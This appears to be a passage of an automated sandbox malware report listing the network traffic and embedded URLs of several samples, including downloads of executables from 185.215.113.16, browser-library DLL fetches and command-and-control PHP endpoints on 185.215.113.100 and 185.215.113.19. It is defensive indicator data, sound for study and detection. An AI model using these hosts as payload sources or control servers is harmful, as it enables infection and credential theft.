Source: global traffic HTTP traffic detected: GET /filestreamingservice/files/bdc392b9-6b81-4aaa-b3ee-2fffd9562edb?P1=1725764978&P2=404&P3=2&P4=WBb34KuFQqMwDM0qCf5hz6r9hwUe5kC8GPtmqdap%2fkx%2fUQ2ctKkN0FeRtfBg52MWh%2be0L4CPD6GZPQj%2b20%2fKxQ%3d%3d HTTP/1.1Host: msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.comConnection: keep-aliveMS-CV: ijXf796fROVwWTc8/tYMCuSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16If-Modified-Since: Sun, 01 Sep 2024 01:45:41 GMTIf-None-Match: "66d3c745-1b0600"
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.100Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /0d60be0de163924d/sqlite3.dll HTTP/1.1Host: 185.215.113.100Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /0d60be0de163924d/freebl3.dll HTTP/1.1Host: 185.215.113.100Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /0d60be0de163924d/mozglue.dll HTTP/1.1Host: 185.215.113.100Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /0d60be0de163924d/msvcp140.dll HTTP/1.1Host: 185.215.113.100Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /0d60be0de163924d/nss3.dll HTTP/1.1Host: 185.215.113.100Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /0d60be0de163924d/softokn3.dll HTTP/1.1Host: 185.215.113.100Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /0d60be0de163924d/vcruntime140.dll HTTP/1.1Host: 185.215.113.100Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.100Connection: Keep-AliveCache-Control: no-cache
Source: global traffic DNS traffic detected: DNS query: bzib.nelreports.net
Source: global traffic DNS traffic detected: DNS query: chrome.cloudflare-dns.com
Source: global traffic DNS traffic detected: DNS query: clients2.googleusercontent.com
Source: unknown HTTP traffic detected: POST /dns-query HTTP/1.1Host: chrome.cloudflare-dns.comConnection: keep-aliveContent-Length: 128Accept: application/dns-messageAccept-Language: *User-Agent: ChromeAccept-Encoding: identityContent-Type: application/dns-message
Source: eb98fe5174.exe, 00000007.00000002.2639639180.0000000000FAE000.00000004.00000020.00020000.00000000.sdmp, eb98fe5174.exe, 00000007.00000002.2619375968.000000000080D000.00000040.00000001.01000000.00000009.sdmp, 53c7d901f1.exe, 00000008.00000002.2653239563.0000000000FAE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.100
Source: eb98fe5174.exe, 00000007.00000002.2639639180.000000000100A000.00000004.00000020.00020000.00000000.sdmp, 53c7d901f1.exe, 00000008.00000002.2653239563.0000000001007000.00000004.00000020.00020000.00000000.sdmp, 53c7d901f1.exe, 00000008.00000002.2653239563.0000000000FAE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.100/
Source: eb98fe5174.exe, 00000007.00000002.2639639180.000000000100A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.100/0d60be0de163924d/freebl3.dll
Source: eb98fe5174.exe, 00000007.00000002.2639639180.000000000100A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.100/0d60be0de163924d/freebl3.dlla
Source: eb98fe5174.exe, 00000007.00000002.2639639180.000000000100A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.100/0d60be0de163924d/mozglue.dll
Source: eb98fe5174.exe, 00000007.00000002.2639639180.000000000100A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.100/0d60be0de163924d/mozglue.dllk
Source: eb98fe5174.exe, 00000007.00000002.2639639180.000000000100A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.100/0d60be0de163924d/msvcp140.dll
Source: eb98fe5174.exe, 00000007.00000002.2639639180.000000000100A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.100/0d60be0de163924d/msvcp140.dllP
Source: eb98fe5174.exe, 00000007.00000002.2639639180.000000000100A000.00000004.00000020.00020000.00000000.sdmp, eb98fe5174.exe, 00000007.00000002.2639639180.0000000000FAE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.100/0d60be0de163924d/nss3.dll
Source: eb98fe5174.exe, 00000007.00000002.2639639180.000000000100A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.100/0d60be0de163924d/nss3.dll5
Source: eb98fe5174.exe, 00000007.00000002.2639639180.000000000100A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.100/0d60be0de163924d/nss3.dllK
Source: eb98fe5174.exe, 00000007.00000002.2639639180.000000000100A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.100/0d60be0de163924d/nss3.dllY
Source: eb98fe5174.exe, 00000007.00000002.2639639180.000000000100A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.100/0d60be0de163924d/nss3.dllll
Source: eb98fe5174.exe, 00000007.00000002.2639639180.000000000100A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.100/0d60be0de163924d/nss3.dllll9
Source: eb98fe5174.exe, 00000007.00000002.2639639180.000000000100A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.100/0d60be0de163924d/nss3.dllllG
Source: eb98fe5174.exe, 00000007.00000002.2639639180.000000000100A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.100/0d60be0de163924d/nss3.dllllo
Source: eb98fe5174.exe, 00000007.00000002.2639639180.000000000100A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.100/0d60be0de163924d/softokn3.dll
Source: eb98fe5174.exe, 00000007.00000002.2639639180.000000000100A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.100/0d60be0de163924d/softokn3.dllA
Source: eb98fe5174.exe, 00000007.00000002.2619375968.00000000006CA000.00000040.00000001.01000000.00000009.sdmp, eb98fe5174.exe, 00000007.00000002.2639639180.000000000100A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.100/0d60be0de163924d/sqlite3.dll
Source: eb98fe5174.exe, 00000007.00000002.2639639180.000000000100A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.100/0d60be0de163924d/sqlite3.dll#
Source: eb98fe5174.exe, 00000007.00000002.2639639180.0000000001024000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.100/0d60be0de163924d/vcruntime140.dll
Source: eb98fe5174.exe, 00000007.00000002.2639639180.0000000001024000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.100/0d60be0de163924d/vcruntime140.dllD
Source: eb98fe5174.exe, 00000007.00000002.2639639180.0000000001024000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.100/0d60be0de163924d/vcruntime140.dlld
Source: 53c7d901f1.exe, 00000008.00000002.2653239563.0000000001007000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.100/ZkRm
Source: 53c7d901f1.exe, 00000008.00000002.2653239563.0000000000FAE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.100/e2b1563c6670f193.php
Source: eb98fe5174.exe, 00000007.00000003.2509141109.000000000107B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.100/e2b1563c6670f193.php#
Source: 53c7d901f1.exe, 00000008.00000002.2653239563.0000000001007000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.100/e2b1563c6670f193.php/
Source: eb98fe5174.exe, 00000007.00000002.2639639180.0000000001024000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.100/e2b1563c6670f193.php0u
Source: 53c7d901f1.exe, 00000008.00000002.2653239563.0000000000FAE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.100/e2b1563c6670f193.php2
Source: eb98fe5174.exe, 00000007.00000002.2639639180.0000000001024000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.100/e2b1563c6670f193.php3
Source: 53c7d901f1.exe, 00000008.00000002.2653239563.0000000001007000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.100/e2b1563c6670f193.php8q
Source: eb98fe5174.exe, 00000007.00000002.2639639180.000000000100A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.100/e2b1563c6670f193.phpA
Source: eb98fe5174.exe, 00000007.00000002.2639639180.0000000001024000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.100/e2b1563c6670f193.phpAECGHCBGCBFHIIDHI$3
Source: 53c7d901f1.exe, 00000008.00000002.2653239563.0000000001007000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.100/e2b1563c6670f193.phpDq
Source: eb98fe5174.exe, 00000007.00000003.2494709645.000000000105D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.100/e2b1563c6670f193.phpDu
Source: eb98fe5174.exe, 00000007.00000002.2639639180.0000000001024000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.100/e2b1563c6670f193.phpE36
Source: eb98fe5174.exe, 00000007.00000002.2639639180.000000000100A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.100/e2b1563c6670f193.phpM
Source: eb98fe5174.exe, 00000007.00000002.2639639180.000000000100A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.100/e2b1563c6670f193.phpU
Source: 53c7d901f1.exe, 00000008.00000002.2653239563.0000000001007000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.100/e2b1563c6670f193.phphq
Source: eb98fe5174.exe, 00000007.00000002.2619375968.000000000080D000.00000040.00000001.01000000.00000009.sdmp String found in binary or memory: http://185.215.113.100/e2b1563c6670f193.phpion:
Source: eb98fe5174.exe, 00000007.00000002.2639639180.000000000100A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.100/e2b1563c6670f193.phpm&
Source: eb98fe5174.exe, 00000007.00000002.2639639180.0000000001024000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.100/e2b1563c6670f193.phpmainnet
Source: eb98fe5174.exe, 00000007.00000002.2639639180.0000000000FAE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.100/e2b1563c6670f193.phprofiles
Source: eb98fe5174.exe, 00000007.00000002.2639639180.0000000000FAE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.100/e2b1563c6670f193.phprowser
Source: 53c7d901f1.exe, 00000008.00000002.2653239563.0000000001007000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.100/ocal
Source: 53c7d901f1.exe, 00000008.00000002.2653239563.0000000001007000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.100/ws
Source: eb98fe5174.exe, 00000007.00000002.2619375968.000000000080D000.00000040.00000001.01000000.00000009.sdmp String found in binary or memory: http://185.215.113.100e2b1563c6670f193.phpion:
Source: explorti.exe, 00000006.00000002.2882067749.0000000001590000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/steam/random.exe
Source: explorti.exe, 00000006.00000002.2882067749.0000000001590000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/steam/random.exe6522KH
Source: explorti.exe, 00000006.00000002.2882067749.0000000001590000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/steam/random.exeBH
Source: explorti.exe, 00000006.00000002.2882067749.00000000015BB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/well/random.exe
Source: explorti.exe, 00000006.00000002.2882067749.00000000015BB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/
Source: explorti.exe, 00000006.00000002.2882067749.00000000015BB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/G
Source: explorti.exe, 00000006.00000002.2882067749.00000000015BB000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000006.00000002.2882067749.0000000001590000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.php
Source: explorti.exe, 00000006.00000002.2882067749.00000000015E3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.php26
Source: explorti.exe, 00000006.00000002.2882067749.00000000015BB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.php3001
Source: explorti.exe, 00000006.00000002.2882067749.00000000015E3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.php53001
Source: explorti.exe, 00000006.00000002.2882067749.00000000015BB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.php8
Source: explorti.exe, 00000006.00000002.2882067749.00000000015BB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpAppDataB$
Source: explorti.exe, 00000006.00000002.2882067749.00000000015BB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpHarddiskVolumef
Source: explorti.exe, 00000006.00000002.2882067749.00000000015BB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpL
Source: explorti.exe, 00000006.00000002.2882067749.00000000015BB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpQ
Source: explorti.exe, 00000006.00000002.2882067749.00000000015BB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpT
Source: explorti.exe, 00000006.00000002.2882067749.00000000015BB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpppData
Source: explorti.exe, 00000006.00000002.2882067749.00000000015BB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.phps
Source: explorti.exe, 00000006.00000002.2882067749.00000000015BB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpta
Source: explorti.exe, 00000006.00000002.2882067749.00000000015BB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.phptch
Source: explorti.exe, 00000006.00000002.2882067749.0000000001590000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpz
Source: explorti.exe, 00000006.00000002.2882067749.00000000015BB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/fae1daa8e9eb0eefeb8846d934f48b15eaa495c49#
Source: explorti.exe, 00000006.00000002.2882067749.00000000015BB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/ones
Source: softokn3[1].dll.7.dr, mozglue.dll.7.dr, nss3[1].dll.7.dr, freebl3.dll.7.dr, freebl3[1].dll.7.dr, mozglue[1].dll.7.dr, nss3.dll.7.dr, softokn3.dll.7.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: softokn3[1].dll.7.dr, mozglue.dll.7.dr, nss3[1].dll.7.dr, freebl3.dll.7.dr, freebl3[1].dll.7.dr, mozglue[1].dll.7.dr, nss3.dll.7.dr, softokn3.dll.7.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: softokn3[1].dll.7.dr, mozglue.dll.7.dr, nss3[1].dll.7.dr, freebl3.dll.7.dr, freebl3[1].dll.7.dr, mozglue[1].dll.7.dr, nss3.dll.7.dr, softokn3.dll.7.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: softokn3[1].dll.7.dr, mozglue.dll.7.dr, nss3[1].dll.7.dr, freebl3.dll.7.dr, freebl3[1].dll.7.dr, mozglue[1].dll.7.dr, nss3.dll.7.dr, softokn3.dll.7.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: softokn3[1].dll.7.dr, mozglue.dll.7.dr, nss3[1].dll.7.dr, freebl3.dll.7.dr, freebl3[1].dll.7.dr, mozglue[1].dll.7.dr, nss3.dll.7.dr, softokn3.dll.7.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: softokn3[1].dll.7.dr, mozglue.dll.7.dr, nss3[1].dll.7.dr, freebl3.dll.7.dr, freebl3[1].dll.7.dr, mozglue[1].dll.7.dr, nss3.dll.7.dr, softokn3.dll.7.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: softokn3[1].dll.7.dr, mozglue.dll.7.dr, nss3[1].dll.7.dr, freebl3.dll.7.dr, freebl3[1].dll.7.dr, mozglue[1].dll.7.dr, nss3.dll.7.dr, softokn3.dll.7.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: softokn3[1].dll.7.dr, mozglue.dll.7.dr, nss3[1].dll.7.dr, freebl3.dll.7.dr, freebl3[1].dll.7.dr, mozglue[1].dll.7.dr, nss3.dll.7.dr, softokn3.dll.7.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: softokn3[1].dll.7.dr, mozglue.dll.7.dr, nss3[1].dll.7.dr, freebl3.dll.7.dr, freebl3[1].dll.7.dr, mozglue[1].dll.7.dr, nss3.dll.7.dr, softokn3.dll.7.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: softokn3[1].dll.7.dr, mozglue.dll.7.dr, nss3[1].dll.7.dr, freebl3.dll.7.dr, freebl3[1].dll.7.dr, mozglue[1].dll.7.dr, nss3.dll.7.dr, softokn3.dll.7.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: softokn3[1].dll.7.dr, mozglue.dll.7.dr, nss3[1].dll.7.dr, freebl3.dll.7.dr, freebl3[1].dll.7.dr, mozglue[1].dll.7.dr, nss3.dll.7.dr, softokn3.dll.7.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: softokn3[1].dll.7.dr, mozglue.dll.7.dr, nss3[1].dll.7.dr, freebl3.dll.7.dr, freebl3[1].dll.7.dr, mozglue[1].dll.7.dr, nss3.dll.7.dr, softokn3.dll.7.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: softokn3[1].dll.7.dr, mozglue.dll.7.dr, nss3[1].dll.7.dr, freebl3.dll.7.dr, freebl3[1].dll.7.dr, mozglue[1].dll.7.dr, nss3.dll.7.dr, softokn3.dll.7.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: softokn3[1].dll.7.dr, mozglue.dll.7.dr, nss3[1].dll.7.dr, freebl3.dll.7.dr, freebl3[1].dll.7.dr, mozglue[1].dll.7.dr, nss3.dll.7.dr, softokn3.dll.7.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: softokn3[1].dll.7.dr, mozglue.dll.7.dr, nss3[1].dll.7.dr, freebl3.dll.7.dr, freebl3[1].dll.7.dr, mozglue[1].dll.7.dr, nss3.dll.7.dr, softokn3.dll.7.dr String found in binary or memory: http://ocsp.digicert.com0
Source: softokn3[1].dll.7.dr, mozglue.dll.7.dr, nss3[1].dll.7.dr, freebl3.dll.7.dr, freebl3[1].dll.7.dr, mozglue[1].dll.7.dr, nss3.dll.7.dr, softokn3.dll.7.dr String found in binary or memory: http://ocsp.digicert.com0A
Source: softokn3[1].dll.7.dr, mozglue.dll.7.dr, nss3[1].dll.7.dr, freebl3.dll.7.dr, freebl3[1].dll.7.dr, mozglue[1].dll.7.dr, nss3.dll.7.dr, softokn3.dll.7.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: softokn3[1].dll.7.dr, mozglue.dll.7.dr, nss3[1].dll.7.dr, freebl3.dll.7.dr, freebl3[1].dll.7.dr, mozglue[1].dll.7.dr, nss3.dll.7.dr, softokn3.dll.7.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: softokn3[1].dll.7.dr, mozglue.dll.7.dr, nss3[1].dll.7.dr, freebl3.dll.7.dr, freebl3[1].dll.7.dr, mozglue[1].dll.7.dr, nss3.dll.7.dr, softokn3.dll.7.dr String found in binary or memory: http://ocsp.digicert.com0X
Source: softokn3[1].dll.7.dr, mozglue.dll.7.dr, nss3[1].dll.7.dr, freebl3.dll.7.dr, freebl3[1].dll.7.dr, mozglue[1].dll.7.dr, nss3.dll.7.dr, softokn3.dll.7.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: eb98fe5174.exe, eb98fe5174.exe, 00000007.00000002.2669122689.000000006C94D000.00000002.00000001.01000000.0000000F.sdmp, mozglue.dll.7.dr, mozglue[1].dll.7.dr String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: eb98fe5174.exe, 00000007.00000002.2654833757.000000001D4FA000.00000004.00000020.00020000.00000000.sdmp, eb98fe5174.exe, 00000007.00000002.2668900391.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: eb98fe5174.exe, 00000007.00000003.2494565892.0000000001079000.00000004.00000020.00020000.00000000.sdmp, ECBAEBGH.7.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 8eb30d7f71.exe, 00000009.00000002.2881189935.0000000001531000.00000004.00000020.00020000.00000000.sdmp, 8eb30d7f71.exe, 00000009.00000002.2881189935.0000000001508000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.c
Source: data_1.14.dr String found in binary or memory: https://arc.msn.com/v4/api/selection?placement=88000360&nct=1&fmt=json&ADEFAB=1&OPSYS=WIN10&locale=e
Source: data_1.14.dr String found in binary or memory: https://azureedge.net
Source: eb98fe5174.exe, 00000007.00000002.2662143008.0000000029431000.00000004.00000020.00020000.00000000.sdmp, eb98fe5174.exe, 00000007.00000002.2639639180.0000000001024000.00000004.00000020.00020000.00000000.sdmp, AAAAECGHCBGCBFHIIDHI.7.dr String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: eb98fe5174.exe, 00000007.00000002.2662143008.0000000029431000.00000004.00000020.00020000.00000000.sdmp, eb98fe5174.exe, 00000007.00000002.2639639180.0000000001024000.00000004.00000020.00020000.00000000.sdmp, AAAAECGHCBGCBFHIIDHI.7.dr String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: Reporting and NEL0.14.dr String found in binary or memory: https://bzib.nelreports.net/api/report?cat=bingbusiness
Source: eb98fe5174.exe, 00000007.00000003.2494565892.0000000001079000.00000004.00000020.00020000.00000000.sdmp, ECBAEBGH.7.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: eb98fe5174.exe, 00000007.00000003.2494565892.0000000001079000.00000004.00000020.00020000.00000000.sdmp, ECBAEBGH.7.dr, Web Data.13.dr String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: eb98fe5174.exe, 00000007.00000003.2494565892.0000000001079000.00000004.00000020.00020000.00000000.sdmp, ECBAEBGH.7.dr, Web Data.13.dr String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Network Persistent State0.21.dr String found in binary or memory: https://chrome.cloudflare-dns.com
Source: manifest.json.21.dr String found in binary or memory: https://chrome.google.com/webstore/
Source: manifest.json.21.dr String found in binary or memory: https://chromewebstore.google.com/
Source: manifest.json0.21.dr String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: eb98fe5174.exe, 00000007.00000002.2662143008.0000000029431000.00000004.00000020.00020000.00000000.sdmp, eb98fe5174.exe, 00000007.00000002.2639639180.0000000001024000.00000004.00000020.00020000.00000000.sdmp, AAAAECGHCBGCBFHIIDHI.7.dr String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: eb98fe5174.exe, 00000007.00000002.2662143008.0000000029431000.00000004.00000020.00020000.00000000.sdmp, eb98fe5174.exe, 00000007.00000002.2639639180.0000000001024000.00000004.00000020.00020000.00000000.sdmp, AAAAECGHCBGCBFHIIDHI.7.dr String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: manifest.json0.21.dr String found in binary or memory: https://docs.google.com/
Source: manifest.json0.21.dr String found in binary or memory: https://drive-autopush.corp.google.com/
Source: manifest.json0.21.dr String found in binary or memory: https://drive-daily-0.corp.google.com/
Source: manifest.json0.21.dr String found in binary or memory: https://drive-daily-1.corp.google.com/
Source: manifest.json0.21.dr String found in binary or memory: https://drive-daily-2.corp.google.com/
Source: manifest.json0.21.dr String found in binary or memory: https://drive-daily-3.corp.google.com/
Source: manifest.json0.21.dr String found in binary or memory: https://drive-daily-4.corp.google.com/
Source: manifest.json0.21.dr String found in binary or memory: https://drive-daily-5.corp.google.com/
Source: manifest.json0.21.dr String found in binary or memory: https://drive-daily-6.corp.google.com/
Source: manifest.json0.21.dr String found in binary or memory: https://drive-preprod.corp.google.com/
Source: manifest.json0.21.dr String found in binary or memory: https://drive-staging.corp.google.com/
Source: manifest.json0.21.dr String found in binary or memory: https://drive.google.com/
Source: eb98fe5174.exe, 00000007.00000003.2494565892.0000000001079000.00000004.00000020.00020000.00000000.sdmp, ECBAEBGH.7.dr, Web Data.13.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: eb98fe5174.exe, 00000007.00000003.2494565892.0000000001079000.00000004.00000020.00020000.00000000.sdmp, ECBAEBGH.7.dr, Web Data.13.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: eb98fe5174.exe, 00000007.00000003.2494565892.0000000001079000.00000004.00000020.00020000.00000000.sdmp, ECBAEBGH.7.dr, Web Data.13.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: data_1.14.dr, 000003.log6.13.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?assetgroup=Arbit
Source: data_1.14.dr, 000003.log9.13.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtrac
Source: AAAAECGHCBGCBFHIIDHI.7.dr String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: softokn3[1].dll.7.dr, mozglue.dll.7.dr, nss3[1].dll.7.dr, freebl3.dll.7.dr, freebl3[1].dll.7.dr, mozglue[1].dll.7.dr, nss3.dll.7.dr, softokn3.dll.7.dr String found in binary or memory: https://mozilla.org0/
Source: data_1.14.dr String found in binary or memory: https://msn.com
Source: 8eb30d7f71.exe, 00000009.00000002.2880910734.0000000001330000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/signinoptions/passwordC:
Source: HCGCBFHCFCFBFIEBGHJECGHCFI.7.dr String found in binary or memory: https://support.mozilla.org
Source: HCGCBFHCFCFBFIEBGHJECGHCFI.7.dr String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: HCGCBFHCFCFBFIEBGHJECGHCFI.7.dr String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: eb98fe5174.exe, 00000007.00000003.2483387429.000000001D3C0000.00000004.00000020.00020000.00000000.sdmp, eb98fe5174.exe, 00000007.00000002.2619375968.0000000000661000.00000040.00000001.01000000.00000009.sdmp, eb98fe5174.exe, 00000007.00000002.2619375968.000000000069C000.00000040.00000001.01000000.00000009.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: eb98fe5174.exe, 00000007.00000002.2619375968.0000000000661000.00000040.00000001.01000000.00000009.sdmp, eb98fe5174.exe, 00000007.00000002.2619375968.000000000069C000.00000040.00000001.01000000.00000009.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK201621kbG1nY
